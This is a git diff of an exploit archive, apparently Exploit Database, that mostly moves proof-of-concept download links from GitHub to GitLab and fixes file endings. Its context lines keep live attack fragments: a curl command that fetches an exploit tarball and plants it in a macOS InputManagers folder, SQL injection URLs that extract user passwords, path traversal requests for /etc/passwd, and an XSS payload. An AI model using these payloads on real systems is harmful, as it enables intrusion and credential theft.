"https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3181.tar.gz" +INPUTMANAGER_URL = "https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3181.tar.gz" INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" + "mkdir -p ~/Library/InputManagers/;" + "cd ~/Library/InputManagers/;" + diff --git a/exploits/osx/local/37825.txt b/exploits/osx/local/37825.txt index a0777ce5b..2e46f29df 100644 --- a/exploits/osx/local/37825.txt +++ b/exploits/osx/local/37825.txt @@ -10,4 +10,4 @@ full writeup #eta#son shout out @ unthreadedjb 4 hax -Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37825.zip \ No newline at end of file +Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37825.zip \ No newline at end of file diff --git a/exploits/osx/local/38136.txt b/exploits/osx/local/38136.txt index 34f979ecc..a27e89bda 100644 --- a/exploits/osx/local/38136.txt +++ b/exploits/osx/local/38136.txt @@ -14,4 +14,4 @@ The Install.framework runner suid root binary does not correctly account for the build using the provided makefile and run passing the full path to the localhost shell Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38136.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38136.zip \ No newline at end of file diff --git a/exploits/osx/local/38137.txt b/exploits/osx/local/38137.txt index a235a6f31..e776c7645 100644 --- a/exploits/osx/local/38137.txt +++ b/exploits/osx/local/38137.txt @@ -64,4 +64,4 @@ Install.framework has a suid root binary here: /System/Library/PrivateFrameworks note that this will create some root-owned temporary directories in /tmp which will need to be manually cleaned up Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38137.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38137.zip \ No newline at end of file diff --git a/exploits/osx/local/38138.txt b/exploits/osx/local/38138.txt index 95da17585..7250526d5 100644 --- a/exploits/osx/local/38138.txt +++ b/exploits/osx/local/38138.txt @@ -52,4 +52,4 @@ the error path in setExternalAuthorizationRef should either be fatal or drop pri Make sure you have the latest xcode installed and run the get_shell.sh script to build and run the PoC. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38138.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38138.zip \ No newline at end of file diff --git a/exploits/osx/local/39741.txt b/exploits/osx/local/39741.txt index a12092cc4..378597d8b 100644 --- a/exploits/osx/local/39741.txt +++ b/exploits/osx/local/39741.txt @@ -38,4 +38,4 @@ Alternative implementation with bootstrap_create_server possible for older versi Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39741.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39741.zip \ No newline at end of file diff --git a/exploits/osx/local/3985.txt b/exploits/osx/local/3985.txt index a89c9b112..4cf726ff4 100644 --- a/exploits/osx/local/3985.txt +++ b/exploits/osx/local/3985.txt @@ -1,5 +1,5 @@ Mac OS X <= 10.4.8 pppd Plugin Loading Privilege Escalation Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3985.tar (05252007-osxpppd.tar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3985.tar (05252007-osxpppd.tar) # milw0rm.com [2007-05-25] \ No newline at end of file diff --git a/exploits/osx/local/4013.txt b/exploits/osx/local/4013.txt index e5b371401..d54ab4f10 100644 --- a/exploits/osx/local/4013.txt +++ b/exploits/osx/local/4013.txt @@ -2,6 +2,6 @@ # # CVE-ID: CVE-2007-0753 - http://docs.info.apple.com/article.html?artnum=305530 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4013.tar.gz (05302007-vpenis.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4013.tar.gz (05302007-vpenis.tar.gz) # milw0rm.com [2007-05-30] \ No newline at end of file diff --git a/exploits/osx/local/40653.txt b/exploits/osx/local/40653.txt index fbe3ed725..e539ec3de 100644 --- a/exploits/osx/local/40653.txt +++ b/exploits/osx/local/40653.txt @@ -28,4 +28,4 @@ No race conditions because the task struct pointer is on the kernel heap, not th Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40653.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40653.zip \ No newline at end of file diff --git a/exploits/osx/local/44239.md b/exploits/osx/local/44239.md index 9c2c60ffc..a1ccfe9f8 100644 --- a/exploits/osx/local/44239.md +++ b/exploits/osx/local/44239.md @@ -28,4 +28,4 @@ The rootsh code is released into the public domain. As a courtesy I ask that if you use any of this code in another project you attribute it to me. -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44239.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44239.zip \ No newline at end of file diff --git a/exploits/osx/remote/21596.txt b/exploits/osx/remote/21596.txt index 85b487c6e..c2fc44493 100644 --- a/exploits/osx/remote/21596.txt +++ b/exploits/osx/remote/21596.txt @@ -4,4 +4,4 @@ A vulnerability has been reported for MacOS X where an attacker may use Software In order to exploit this vulnerability, the attacker must control the machine located at swquery.apple.com, from the perspective of the vulnerable client. It may be possible to create this condition through some known techniques, including DNS cache poisoning and DNS spoofing. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21596.tgz.tar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21596.tgz.tar \ No newline at end of file diff --git a/exploits/osx/remote/25598.txt b/exploits/osx/remote/25598.txt index 56ff53808..01b0d17cf 100644 --- a/exploits/osx/remote/25598.txt +++ b/exploits/osx/remote/25598.txt @@ -4,6 +4,6 @@ Apple Mac OS X is prone to a directory-traversal vulnerability. Since the softwa This issue was initially reported in BID 13480 (Apple Mac OS X Multiple Vulnerabilities). Due to the availability of more information, this issue is being assigned a new BID. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25598-1.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25598-1.tar.gz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25598-2.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25598-2.tar.gz \ No newline at end of file diff --git a/exploits/osx/remote/28643.txt b/exploits/osx/remote/28643.txt index a81e9e43a..d7a0c8877 100644 --- a/exploits/osx/remote/28643.txt +++ b/exploits/osx/remote/28643.txt @@ -4,4 +4,4 @@ The Apple Mac OS X AirPort wireless driver is prone to multiple buffer-overflow An attacker can exploit these issues to have arbitrary machine code execute with kernel-level privileges. One of the issues allows code execution in the context of an application using the wireless API. This may lead to denial-of-service conditions or the complete compromise of the affected computer. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28643.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28643.zip \ No newline at end of file diff --git a/exploits/osx/remote/29448.txt b/exploits/osx/remote/29448.txt index 6d71da7d2..14e7a8fca 100644 --- a/exploits/osx/remote/29448.txt +++ b/exploits/osx/remote/29448.txt @@ -6,4 +6,4 @@ A successful exploit can allow a remote attacker to cause kernel panic, resultin Mac OS X 10.4.8 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29448.dmg.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29448.dmg.gz \ No newline at end of file diff --git a/exploits/osx/remote/8753.txt b/exploits/osx/remote/8753.txt index 78f0507ba..4b1d080f9 100644 --- a/exploits/osx/remote/8753.txt +++ b/exploits/osx/remote/8753.txt @@ -42,6 +42,6 @@ systems. http://landonf.bikemonkey.org/static/moab-tests/CVE-2008-5353/hello.html -compiled/decompiled: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8753.tgz (2009-javax.tgz) +compiled/decompiled: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8753.tgz (2009-javax.tgz) # milw0rm.com [2009-05-20] \ No newline at end of file diff --git a/exploits/palm_os/local/20241.txt b/exploits/palm_os/local/20241.txt index 76b697ce6..0504370f9 100644 --- a/exploits/palm_os/local/20241.txt +++ b/exploits/palm_os/local/20241.txt @@ -6,6 +6,6 @@ The encoded password block is stored in the 'Unsaved Preferences' database on th Successful exploitation yields unauthorized access to private data. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20241-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20241-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20241-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20241-2.zip \ No newline at end of file diff --git a/exploits/palm_os/local/20505.txt b/exploits/palm_os/local/20505.txt index c8c230a1e..ba87c63f1 100644 --- a/exploits/palm_os/local/20505.txt +++ b/exploits/palm_os/local/20505.txt @@ -46,4 +46,4 @@ The are also a number of likely scenarios that can allow an attacker to obtain t * The attacker may view the tokencode as it is being physically entered by the user ("shoulder surfing"). -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20505.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20505.zip \ No newline at end of file diff --git a/exploits/php/dos/14678.txt b/exploits/php/dos/14678.txt index bd88540fb..b7aaa3c85 100644 --- a/exploits/php/dos/14678.txt +++ b/exploits/php/dos/14678.txt @@ -49,4 +49,4 @@ FROM rdb$database", generator, inc); =========================================================================== Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14678.zip (ibase_gen_id_poc.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14678.zip (ibase_gen_id_poc.zip) \ No newline at end of file diff --git a/exploits/php/dos/18296.txt b/exploits/php/dos/18296.txt index 559b503e6..96fcfc18d 100644 --- a/exploits/php/dos/18296.txt +++ b/exploits/php/dos/18296.txt @@ -20,7 +20,7 @@ Original version by itz me (opensc.ws) CVE-2011-4885 Mirrors List: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18296.txt (hashcollide.txt) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18296.txt (hashcollide.txt) http://compsoc.nuigalway.ie/~infodox/hashcollide.txt http://jrs-s.net/hashcollide.txt http://www.infodox.co.cc/Downloads/hashcollide.txt diff --git a/exploits/php/dos/24855.txt b/exploits/php/dos/24855.txt index f582a094a..ce5f1ad41 100644 --- a/exploits/php/dos/24855.txt +++ b/exploits/php/dos/24855.txt @@ -18,4 +18,4 @@ The PHP function 'unserialize()' is also reported prone to an information disclo Finally, the PHP function 'unserialize()', is reported prone to an additional vulnerability. It is reported that previous versions of this function allow a malicious programmer to set references to entries of a variable hash that have already been freed. This can lead to remote memory corruption. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24855.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24855.zip \ No newline at end of file diff --git a/exploits/php/dos/33677.txt b/exploits/php/dos/33677.txt index ed021e9b7..e4c31de00 100644 --- a/exploits/php/dos/33677.txt +++ b/exploits/php/dos/33677.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to steal sessions or other sensitive data. Versions prior to PHP 5.2.13 are affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33677.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33677.tar.gz \ No newline at end of file diff --git a/exploits/php/dos/35358.txt b/exploits/php/dos/35358.txt index 615e2077c..886077d7e 100644 --- a/exploits/php/dos/35358.txt +++ b/exploits/php/dos/35358.txt @@ -1,4 +1,4 @@ -Full Package: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35358.tgz +Full Package: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35358.tgz Description: ------------ diff --git a/exploits/php/dos/44768.txt b/exploits/php/dos/44768.txt index 7f4487afa..1aebbdf66 100644 --- a/exploits/php/dos/44768.txt +++ b/exploits/php/dos/44768.txt @@ -9,4 +9,4 @@ An application is vulnerable when: - And the SQL mode does not contain STRICT_ALL_TABLES or STRICT_TRANS_TABLES (check via SELECT @@sql_mode). POC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44768.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44768.tgz \ No newline at end of file diff --git a/exploits/php/remote/32618.txt b/exploits/php/remote/32618.txt index bea2efe07..8b7987c53 100644 --- a/exploits/php/remote/32618.txt +++ b/exploits/php/remote/32618.txt @@ -72,4 +72,4 @@ mysql root, facebook/twitter accounts and so on. --- -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32618.tgz \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32618.tgz \ No newline at end of file diff --git a/exploits/php/remote/39742.txt b/exploits/php/remote/39742.txt index db1cc7296..7a277b85a 100644 --- a/exploits/php/remote/39742.txt +++ b/exploits/php/remote/39742.txt @@ -204,5 +204,5 @@ This issue has been fixed in php 7.0.6. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39742.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39742.zip https://github.com/dyntopia/exploits/tree/master/CVE-2016-3078 \ No newline at end of file diff --git a/exploits/php/remote/42692.rb b/exploits/php/remote/42692.rb index 0038949f5..17d92719b 100755 --- a/exploits/php/remote/42692.rb +++ b/exploits/php/remote/42692.rb @@ -113,4 +113,4 @@ class MetasploitModule < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/exploits/php/webapps/10069.php b/exploits/php/webapps/10069.php index 0e379e82b..53fc39e85 100644 --- a/exploits/php/webapps/10069.php +++ b/exploits/php/webapps/10069.php @@ -52,6 +52,4 @@ $resp .= fread($ock, 1024); echo $resp; echo "[+]done!\r\n"; echo "[+]go to http://$host$path/e/tool/gbook/?bid=1 see the hash" -?> - - +?> \ No newline at end of file diff --git a/exploits/php/webapps/10407.txt b/exploits/php/webapps/10407.txt index 4ce2c9508..0ba26ca49 100644 --- a/exploits/php/webapps/10407.txt +++ b/exploits/php/webapps/10407.txt @@ -36,6 +36,4 @@ http://site.com/index.php?page=shop.product_details&flypage=shop.flypage&product [#] Thx to - HI Cyber4rt crew [Facebook: Hacker Indonesia] -- all Soldier of Allah, Tecon Crew, Jatimcrew, Indonesian Hacker and specially for YOU - - +- all Soldier of Allah, Tecon Crew, Jatimcrew, Indonesian Hacker and specially for YOU \ No newline at end of file diff --git a/exploits/php/webapps/10656.txt b/exploits/php/webapps/10656.txt index f0ead93e5..79bbbfb37 100644 --- a/exploits/php/webapps/10656.txt +++ b/exploits/php/webapps/10656.txt @@ -22,5 +22,4 @@ http://localhost/path/cat_sell.php?cid=1+union+all+select 1,concat(sb_admin_name [+] example [+] http://www.youtube.com/watch?v=uEK_Ah3htr0 ====================================================================================== -[+]Special Thanks:- Hangaw_hawlery & FormatXformaT and all kurd-security members - +[+]Special Thanks:- Hangaw_hawlery & FormatXformaT and all kurd-security members \ No newline at end of file diff --git a/exploits/php/webapps/11028.txt b/exploits/php/webapps/11028.txt index 4ddd96243..05ea3bec1 100644 --- a/exploits/php/webapps/11028.txt +++ b/exploits/php/webapps/11028.txt @@ -24,4 +24,4 @@ http://localhost/docebo/index.php?modname=../../../../../../../boot.ini%00&op=lo # Greetz : To all my friends # Note : Proud to be a Sri Lankan # Me : Sri Lankan Hacker -######################################## +######################################## \ No newline at end of file diff --git a/exploits/php/webapps/11222.txt b/exploits/php/webapps/11222.txt index dc230bfae..bb2098305 100644 --- a/exploits/php/webapps/11222.txt +++ b/exploits/php/webapps/11222.txt @@ -32,4 +32,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11236.txt b/exploits/php/webapps/11236.txt index 62de0c91c..638755219 100644 --- a/exploits/php/webapps/11236.txt +++ b/exploits/php/webapps/11236.txt @@ -46,4 +46,4 @@ areas%5B%5D=content&Itemid=1§ionid=0&limitstart= !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11237.txt b/exploits/php/webapps/11237.txt index 260d00afc..7923a7fa3 100644 --- a/exploits/php/webapps/11237.txt +++ b/exploits/php/webapps/11237.txt @@ -29,4 +29,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11238.txt b/exploits/php/webapps/11238.txt index 3eba834c9..76c4f04b1 100644 --- a/exploits/php/webapps/11238.txt +++ b/exploits/php/webapps/11238.txt @@ -26,4 +26,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11239.txt b/exploits/php/webapps/11239.txt index 550bfaf52..40c40ef5f 100644 --- a/exploits/php/webapps/11239.txt +++ b/exploits/php/webapps/11239.txt @@ -43,4 +43,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11270.txt b/exploits/php/webapps/11270.txt index f273c8ed8..f504b40c1 100644 --- a/exploits/php/webapps/11270.txt +++ b/exploits/php/webapps/11270.txt @@ -45,4 +45,4 @@ Array ( [0] => option [1] => [JOOMLA_PATH] [2] => ' AND 1=1 ) !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11271.txt b/exploits/php/webapps/11271.txt index d41f55942..68028f6c5 100644 --- a/exploits/php/webapps/11271.txt +++ b/exploits/php/webapps/11271.txt @@ -28,4 +28,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11277.txt b/exploits/php/webapps/11277.txt index 775d7bc14..ea60b5195 100644 --- a/exploits/php/webapps/11277.txt +++ b/exploits/php/webapps/11277.txt @@ -27,4 +27,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11279.txt b/exploits/php/webapps/11279.txt index dbf802555..5edaec7e6 100644 --- a/exploits/php/webapps/11279.txt +++ b/exploits/php/webapps/11279.txt @@ -31,4 +31,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11280.txt b/exploits/php/webapps/11280.txt index 87a301fb6..c3586b8e8 100644 --- a/exploits/php/webapps/11280.txt +++ b/exploits/php/webapps/11280.txt @@ -30,4 +30,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11286.txt b/exploits/php/webapps/11286.txt index 237eb8a26..2f97f379b 100644 --- a/exploits/php/webapps/11286.txt +++ b/exploits/php/webapps/11286.txt @@ -30,4 +30,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11287.txt b/exploits/php/webapps/11287.txt index 1665c9fe1..17c1a4c85 100644 --- a/exploits/php/webapps/11287.txt +++ b/exploits/php/webapps/11287.txt @@ -30,4 +30,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11292.txt b/exploits/php/webapps/11292.txt index 3923e264d..d1049efbe 100644 --- a/exploits/php/webapps/11292.txt +++ b/exploits/php/webapps/11292.txt @@ -25,4 +25,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11349.txt b/exploits/php/webapps/11349.txt index 75352c734..35690980f 100644 --- a/exploits/php/webapps/11349.txt +++ b/exploits/php/webapps/11349.txt @@ -21,4 +21,4 @@ Demo: http:/server/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,password,username,6+from+exponent_user-- -#################################################################### +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/11610.txt b/exploits/php/webapps/11610.txt index c6a0e4968..5cce93434 100644 --- a/exploits/php/webapps/11610.txt +++ b/exploits/php/webapps/11610.txt @@ -32,4 +32,4 @@ http://server/catalog/good.php?good_id=1/**/union/**/all/**/select/**/1,2,3,4,5, http://server/catalog/good.php?good_id= -http://server/catalog/good.php?good_id=164<script>alert("XSS")</script> +http://server/catalog/good.php?good_id=164<script>alert("XSS")</script> \ No newline at end of file diff --git a/exploits/php/webapps/11674.txt b/exploits/php/webapps/11674.txt index 5d8adce54..7a7fabcd4 100644 --- a/exploits/php/webapps/11674.txt +++ b/exploits/php/webapps/11674.txt @@ -25,5 +25,4 @@ [+] Exploitable - http://[host]/[path]/[script].php?pageNum_RSnews=0&id=9999999+union+select+1,2,3,user,5,pass,7,8,9+from+reguser-- - + http://[host]/[path]/[script].php?pageNum_RSnews=0&id=9999999+union+select+1,2,3,user,5,pass,7,8,9+from+reguser-- \ No newline at end of file diff --git a/exploits/php/webapps/11676.txt b/exploits/php/webapps/11676.txt index 69bb61057..f7ada6004 100644 --- a/exploits/php/webapps/11676.txt +++ b/exploits/php/webapps/11676.txt @@ -53,5 +53,4 @@ After execution refresh the page and u can see that user having giving ID get deleted automatically. -#If you have any questions, comments, or concerns, feel free to contact me. - +#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/exploits/php/webapps/11680.txt b/exploits/php/webapps/11680.txt index 442f73b1e..aaec9d565 100644 --- a/exploits/php/webapps/11680.txt +++ b/exploits/php/webapps/11680.txt @@ -79,4 +79,4 @@ After execution refresh the page and u can see that user having giving name Added automatically with Admin Privilege. -#If you have any questions, comments, or concerns, feel free to contact me. +#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/exploits/php/webapps/11686.txt b/exploits/php/webapps/11686.txt index c5b56db06..941a7d6eb 100644 --- a/exploits/php/webapps/11686.txt +++ b/exploits/php/webapps/11686.txt @@ -68,4 +68,4 @@ After execution refresh the page and u can see that a new link with teh given name is Added automatically. - #If you have any questions, comments, or concerns, feel free to contact me. + #If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/exploits/php/webapps/11781.html b/exploits/php/webapps/11781.html index 171b43cb0..16def59fd 100644 --- a/exploits/php/webapps/11781.html +++ b/exploits/php/webapps/11781.html @@ -50,4 +50,4 @@ After execution refresh the page and u can see that a added content is deleted automatically. - #If you have any questions, comments, or concerns, feel free to contact me. + #If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/exploits/php/webapps/11829.txt b/exploits/php/webapps/11829.txt index 23372ca99..fc487db3d 100644 --- a/exploits/php/webapps/11829.txt +++ b/exploits/php/webapps/11829.txt @@ -26,5 +26,4 @@ [+] Exploitable - http://[host]/[path]/lexikon.php?action=show&id=null+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+bb1_users+where+userid=1-- - + http://[host]/[path]/lexikon.php?action=show&id=null+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+bb1_users+where+userid=1-- \ No newline at end of file diff --git a/exploits/php/webapps/11841.txt b/exploits/php/webapps/11841.txt index 44218116d..281cec329 100644 --- a/exploits/php/webapps/11841.txt +++ b/exploits/php/webapps/11841.txt @@ -11,4 +11,4 @@ exploit: http://localhost.com/stack/documentation.php?action=/../../../../../../ =============================================================================================== Salam Hangat: S3T4N, JACK, MADONK, YOGA0400, EMINEM, YUDIS, VRS-HCK, OON_BOY, NOGE KECEMPLUNGKALEN, ALL MAINHACK, ALL SERVERISDOWN.ORG -================================================================================================ +================================================================================================ \ No newline at end of file diff --git a/exploits/php/webapps/12009.html b/exploits/php/webapps/12009.html index a27adeb2c..29fd5da9e 100644 --- a/exploits/php/webapps/12009.html +++ b/exploits/php/webapps/12009.html @@ -85,4 +85,4 @@ After execution just refresh the page and we can see that the admin user added automatically. - #If you have any questions, comments, or concerns, feel free to contact me. + #If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/exploits/php/webapps/12101.txt b/exploits/php/webapps/12101.txt index bae30b7b0..420803d1b 100644 --- a/exploits/php/webapps/12101.txt +++ b/exploits/php/webapps/12101.txt @@ -28,5 +28,4 @@ Greetz : -:- SkyCreW -:- Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001 , mywisdom , s4va, Winda Slovski , stardustmemory, wishnusakti, Xco Nuxco , Cakill Schumbag, dkk -(o)===================================================================================(o) - +(o)===================================================================================(o) \ No newline at end of file diff --git a/exploits/php/webapps/12325.txt b/exploits/php/webapps/12325.txt index f0d376c2a..557625d91 100644 --- a/exploits/php/webapps/12325.txt +++ b/exploits/php/webapps/12325.txt @@ -10,5 +10,4 @@ dork :inurl:index.php?option=com_portfolio exp: -http://server/components/com_portfolio/includes/phpthumb/phpThumb.php?w=800&src=../../../../etc/passwd - +http://server/components/com_portfolio/includes/phpthumb/phpThumb.php?w=800&src=../../../../etc/passwd \ No newline at end of file diff --git a/exploits/php/webapps/12338.txt b/exploits/php/webapps/12338.txt index fcc6c0c53..5a1621a10 100644 --- a/exploits/php/webapps/12338.txt +++ b/exploits/php/webapps/12338.txt @@ -21,7 +21,7 @@ export_item_id=18 and 1=1&include_deps=on&output_format=3&export_type=graph_temp =========================================================================== Download: =========================================================================== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12338.pdf (Bonsai-SQL_Injection_in_Cacti.pdf) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12338.pdf (Bonsai-SQL_Injection_in_Cacti.pdf) <Bonsai Information Security Advisories> diff --git a/exploits/php/webapps/12339.txt b/exploits/php/webapps/12339.txt index 3ba0b8595..1f2dc4766 100644 --- a/exploits/php/webapps/12339.txt +++ b/exploits/php/webapps/12339.txt @@ -19,7 +19,7 @@ Note that other properties of a Graph Template might also be affected. =========================================================================== Download: =========================================================================== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12339.pdf (Bonsai-OS_Command_Injection_in_Cacti.pdf) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12339.pdf (Bonsai-OS_Command_Injection_in_Cacti.pdf) <Bonsai Information Security Advisories> diff --git a/exploits/php/webapps/12395.txt b/exploits/php/webapps/12395.txt index 72a344cab..acaab7f6c 100644 --- a/exploits/php/webapps/12395.txt +++ b/exploits/php/webapps/12395.txt @@ -34,7 +34,4 @@ ShoutZ : Greetz : -------- - ---*L0rd ÇrusAdêr*---d4rk-blu™® 